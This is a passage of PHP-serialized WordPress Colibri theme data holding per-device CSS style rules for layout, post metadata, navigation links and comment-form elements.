none;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: none;\n}\n#colibri .style-54-icon:hover {\n  background-color: rgba(3, 169, 244, 0);\n  background-image: none;\n}\n#colibri .style-54 .list-item-text-wrapper {\n  horizontal-align: start;\n  padding-right: 0px;\n  padding-bottom: 0px;\n}\n#colibri .style-54 .list-text {\n  margin-left: 5px;\n  color: #FFFFFF;\n  font-size: 14px;\n}\n#colibri .style-54 .list-divider {\n  color: rgb(0,0,0);\n  width: 100% ;\n  height: 100%;\n  border-top-width: 0px;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-style: solid;\n  margin-left: 0px;\n}\n#colibri .style-54 .list-container-divider {\n  width: 1px ;\n  padding-top: 0px;\n  padding-right: 10px;\n  padding-bottom: 0px;\n  padding-left: 10px;\n  height: 100%;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:55;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-55 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:56;a:3:{s:7:\"desktop\";s:376:\"#colibri .style-56 .social-icon-container {\n  margin-right: 0px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .style-56 .icon-container {\n  fill: rgb(204, 204, 204);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-56 .icon-container:hover {\n  fill: #FFFFFF;\n}\n#colibri .style-56 .icon-container:hover {\n  fill: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:57;a:3:{s:7:\"desktop\";s:485:\"#colibri .style-57 {\n  height: auto;\n  min-height: unset;\n  color: #FFFFFF;\n  background-color: #03a9f4;\n  background-image: none;\n  padding-top: 50px;\n  padding-bottom: 50px;\n}\n#colibri .style-57 h1 {\n  color: #FFFFFF;\n}\n#colibri .style-57 h2 {\n  color: #FFFFFF;\n}\n#colibri .style-57 h3 {\n  color: #FFFFFF;\n}\n#colibri .style-57 h4 {\n  color: #FFFFFF;\n}\n#colibri .style-57 h5 {\n  color: #FFFFFF;\n}\n#colibri .style-57 h6 {\n  color: #FFFFFF;\n}\n#colibri .style-57 p {\n  color: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:58;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:59;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-59 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:60;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:61;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:62;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-62 {\n  height: auto;\n  min-height: unset;\n  padding-top: 30px;\n  padding-bottom: 30px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:63;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:64;a:3:{s:7:\"desktop\";s:156:\".style-64 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-64 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:65;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:66;a:3:{s:7:\"desktop\";s:482:\"#colibri .style-66 {\n  background-color: #FFFFFF;\n  background-image: none;\n  box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:109:\"#colibri .style-66 {\n  margin-top: 10px;\n  margin-right: 10px;\n  margin-bottom: 10px;\n  margin-left: 10px;\n}\n\";}i:67;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-67 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:68;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:69;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:70;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:71;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:72;a:3:{s:7:\"desktop\";s:76:\"#colibri .style-72 {\n  background-color: unset;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:73;a:3:{s:7:\"desktop\";s:209:\".style-73 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-73 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-color: unset;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:74;a:3:{s:7:\"desktop\";s:233:\"#colibri .style-74 {\n  background-color: #03a9f4;\n  background-image: none;\n  text-align: center;\n}\n#colibri .style-74 .colibri-post-thumbnail-shortcode img {\n  height: 300px;\n  object-position: center center;\n  object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:75;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:76;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-76 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:77;a:3:{s:7:\"desktop\";s:646:\"#colibri .style-77 a {\n  font-family: Open Sans;\n  font-weight: 400;\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-77 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-77 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-77 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-77 .metadata-suffix {\n  font-size: 14px;\n}\n#colibri .style-77 .metadata-suffix:hover {\n  color: rgb(153, 153, 153);\n}\n#colibri .style-77 .metadata-suffix:hover {\n  color: rgb(153, 153, 153);\n}\n#colibri .style-77 svg {\n  width: 18px ;\n  height: 18px;\n  display: none;\n  margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:78;a:3:{s:7:\"desktop\";s:169:\"#colibri .style-78 .colibri-post-content {\n  margin-bottom: 0px;\n  color: rgb(51, 51, 51);\n}\n#colibri .style-78 .colibri-post-content p {\n  color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:79;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-79 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:80;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-80 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:81;a:3:{s:7:\"desktop\";s:205:\"#colibri .style-81 {\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(102, 102, 102);\n  margin-right: 5px;\n}\n#colibri .style-81 p {\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:82;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-82 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:83;a:3:{s:7:\"desktop\";s:472:\"#colibri .style-83 a,#colibri .style-83  .colibri-post-category {\n  margin-right: 5px;\n  margin-left: 5px;\n  text-decoration: none;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-83 a:hover,#colibri .style-83  .colibri-post-category:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-83 a:hover,#colibri .style-83  .colibri-post-category:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-83 .categories-prefix {\n  margin-right: 16px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:84;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:85;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-85 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:86;a:3:{s:7:\"desktop\";s:245:\"#colibri .style-86 {\n  font-weight: 400;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(102, 102, 102);\n  margin-right: 5px;\n}\n#colibri .style-86 p {\n  font-weight: 400;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:87;a:3:{s:7:\"desktop\";s:155:\".style-87 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 23px;\n}\n#colibri .style-87 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:88;a:3:{s:7:\"desktop\";s:498:\"#colibri .style-88 a,#colibri .style-88  .colibri-post-tag {\n  margin-right: 5px;\n  margin-left: 5px;\n  text-decoration: none;\n  font-size: 14px;\n  line-height: 1.6;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-88 a:hover,#colibri .style-88  .colibri-post-tag:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-88 a:hover,#colibri .style-88  .colibri-post-tag:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-88 .tags-prefix {\n  margin-right: 5px;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:89;a:3:{s:7:\"desktop\";s:452:\"#colibri .style-89 {\n  margin-right: 30px;\n  margin-left: 30px;\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:66:\"#colibri .style-89 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";s:6:\"mobile\";s:66:\"#colibri .style-89 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:90;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-90 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:91;a:3:{s:7:\"desktop\";s:758:\"#colibri .style-91 .nav-previous a,#colibri .style-91 .nav-next a {\n  text-decoration: none;\n  color: rgb(51, 51, 51);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n  background-color: unset;\n  background-image: none;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n  color: #03a9f4;\n}\n#colibri .style-91 .nav-previous a:hover,#colibri .style-91 .nav-next a:hover {\n  color: #03a9f4;\n}\n#colibri .style-91 .post-title {\n  max-width: 40ch;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:92;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-92 {\n  text-align: right;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:93;a:3:{s:7:\"desktop\";s:651:\"#colibri .style-93 .nav-previous a,#colibri .style-93 .nav-next a {\n  text-decoration: none;\n  color: rgb(51, 51, 51);\n  border-top-width: 2px;\n  border-top-color: black;\n  border-top-style: none;\n  border-right-width: 2px;\n  border-right-color: black;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: black;\n  border-bottom-style: none;\n  border-left-width: 2px;\n  border-left-color: black;\n  border-left-style: none;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n  color: #03a9f4;\n}\n#colibri .style-93 .nav-previous a:hover,#colibri .style-93 .nav-next a:hover {\n  color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:94;a:3:{s:7:\"desktop\";s:103:\"#colibri .style-94 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:95;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:96;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:97;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:98;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:99;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:100;a:3:{s:7:\"desktop\";s:125:\"#colibri .style-100 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 15px;\n}\n\";s:6:\"tablet\";s:47:\"#colibri .style-100 {\n  padding-bottom: 5px;\n}\n\";s:6:\"mobile\";s:47:\"#colibri .style-100 {\n  padding-bottom: 5px;\n}\n\";}i:101;a:3:{s:7:\"desktop\";s:3602:\"#colibri .style-101 .blog-post-comments {\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 15px;\n}\n#colibri .style-101 .comment.even {\n  background-color: #FFFFFF;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  padding-top: 12px;\n  padding-right: 12px;\n  padding-bottom: 12px;\n  padding-left: 12px;\n}\n#colibri .style-101 .comment.odd {\n  background-color: rgba(166, 220, 244, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  padding-top: 12px;\n  padding-right: 12px;\n  padding-bottom: 12px;\n  padding-left: 12px;\n}\n#colibri .style-101 .comments-title {\n  font-family: Open Sans;\n  font-weight: 600;\n  text-decoration: none;\n  font-size: 1.25em;\n  color: rgb(0, 0, 0);\n}\n#colibri .style-101 .comment-meta {\n  color: rgb(153, 153, 153);\n  margin-bottom: 16px;\n}\n#colibri .style-101 .comment-author img {\n  width: 30px ;\n  height: 30px;\n  background-color: unset;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-101 .comment-author .url {\n  font-weight: 600;\n  font-style: normal;\n  text-decoration: none;\n  color: rgb(51, 51, 51);\n  background-color: unset;\n  background-image: none;\n  margin-left: 5px;\n}\n#colibri .style-101 .comment-metadata {\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n  background-color: unset;\n  background-image: none;\n  transition-duration: 0.5s;\n}\n#colibri .style-101 .comment-metadata:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-101 .comment-metadata:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-101 .comment-content {\n  text-decoration: none;\n  font-size: 16px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-101 .comment-content p {\n  color: rgb(102, 102, 102);\n}\n#colibri .style-101 .comment-content a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-body .reply a {\n  margin-bottom: 10px;\n  font-weight: 400;\n  text-transform: lowercase;\n  font-size: 1em;\n  line-height: 1.5;\n  color: #03a9f4;\n}\n#colibri .style-101 .comment-body .reply a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-101 .comment-body .reply a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-101 .children {\n  margin-left: 12px;\n}\n#colibri .style-101 .comments-disabled {\n  text-align: center;\n  margin-bottom: 0px;\n  text-decoration: none;\n  color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:102;a:3:{s:7:\"desktop\";s:4044:\"#colibri .comment-respond {\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  padding-top: 15px;\n}\n#colibri .comment-respond .comment-reply-title {\n  font-family: Open Sans;\n  font-weight: 600;\n  font-size: 1.25em;\n  color: rgb(0, 0, 0);\n}\n#colibri .comment-respond label {\n  color: rgb(102, 102, 102);\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .comment-respond input:not([type=\"submit\"]),#colibri .comment-respond textarea {\n  border-top-width: 1px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 1px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 1px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 16px;\n  color: rgb(102, 102, 102);\n  background-color: rgba(0,0,0,0);\n  background-image: none;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .comment-respond .comment-form [type=\"submit\"] {\n  background-color: #03a9f4;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: #FFFFFF;\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n  background-color: rgb(2, 110, 159);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:hover {\n  background-color: rgb(2, 110, 159);\n  border-top-color: rgb(2, 110, 159);\n  border-right-color: rgb(2, 110, 159);\n  border-bottom-color: rgb(2, 110, 159);\n  border-left-color: rgb(2, 110, 159);\n}\n#colibri .comment-respond .comment-form [type=\"submit\"]:active {\n  background-color: #03a9f4;\n  background-image: none;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: #FFFFFF;\n}\n#colibri .comment-respond .comment-notes {\n  font-family: Open Sans;\n  font-weight: 400;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:103;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-103 {\n  margin-top: -30px;\n}\n\";s:6:\"tablet\";s:45:\"#colibri .style-103 {\n  margin-top: -15px;\n}\n\";s:6:\"mobile\";s:0:\"\";}i:104;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-104 {\n  height: auto;\n  min-height: unset;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:105;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:106;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:107;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:108;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:109;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:110;a:3:{s:7:\"desktop\";s:542:\"#colibri .style-110 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-color: #FFFFFF;\n  background-image: none;\n  box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:111;a:3:{s:7:\"desktop\";s:269:\"#colibri .style-111 {\n  background-color: rgba(255,255,255,0);\n  background-image: none;\n  text-align: center;\n  margin-bottom: 0px;\n}\n#colibri .style-111 .colibri-post-thumbnail-shortcode img {\n  height: 300px;\n  object-position: center center;\n  object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:112;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-112 {\n  margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:113;a:3:{s:7:\"desktop\";s:543:\".style-113 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-113 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  border-top-width: 0px;\n  border-top-color: rgb(238, 238, 238);\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: rgb(238, 238, 238);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(238, 238, 238);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: rgb(238, 238, 238);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:46:\"#colibri .style-113 {\n  text-align: center;\n}\n\";}i:114;a:3:{s:7:\"desktop\";s:531:\"#colibri .style-114 {\n  margin-bottom: 0px;\n}\n#colibri .style-114 a {\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-114 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-114 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-114 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-114 .metadata-suffix {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-114 svg {\n  width: 18px ;\n  height: 18px;\n  display: none;\n  margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:115;a:3:{s:7:\"desktop\";s:485:\"#colibri .style-115 a {\n  text-decoration: none;\n  font-size: 14px;\n  color: rgb(153, 153, 153);\n}\n#colibri .style-115 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-115 a:hover {\n  color: rgb(0, 0, 0);\n}\n#colibri .style-115 .metadata-prefix {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-115 .metadata-suffix {\n  font-size: 14px;\n  color: rgb(102, 102, 102);\n}\n#colibri .style-115 svg {\n  width: 18px ;\n  height: 18px;\n  display: none;\n  margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:116;a:3:{s:7:\"desktop\";s:198:\"#colibri .style-116 h1,#colibri .style-116  h2,#colibri .style-116  h3,#colibri .style-116  h4,#colibri .style-116  h5,#colibri .style-116  h6 {\n  margin-bottom: 0px;\n  transition-duration: 0.5s;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:117;a:3:{s:7:\"desktop\";s:75:\"#colibri .style-117 .colibri-post-excerpt {\n  color: rgb(102, 102, 102);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:118;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:119;a:3:{s:7:\"desktop\";s:157:\".style-119 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-119 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:120;a:3:{s:7:\"desktop\";s:293:\"#colibri .style-120 a {\n  text-decoration: none;\n  color: #03a9f4;\n}\n#colibri .style-120 a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-120 a:hover {\n  color: rgb(2, 110, 159);\n}\n#colibri .style-120 svg {\n  width: 24px ;\n  height: 24px;\n  display: inline-block;\n  margin-right: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:121;a:3:{s:7:\"desktop\";s:158:\".style-121 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-121 {\n  text-align: right;\n  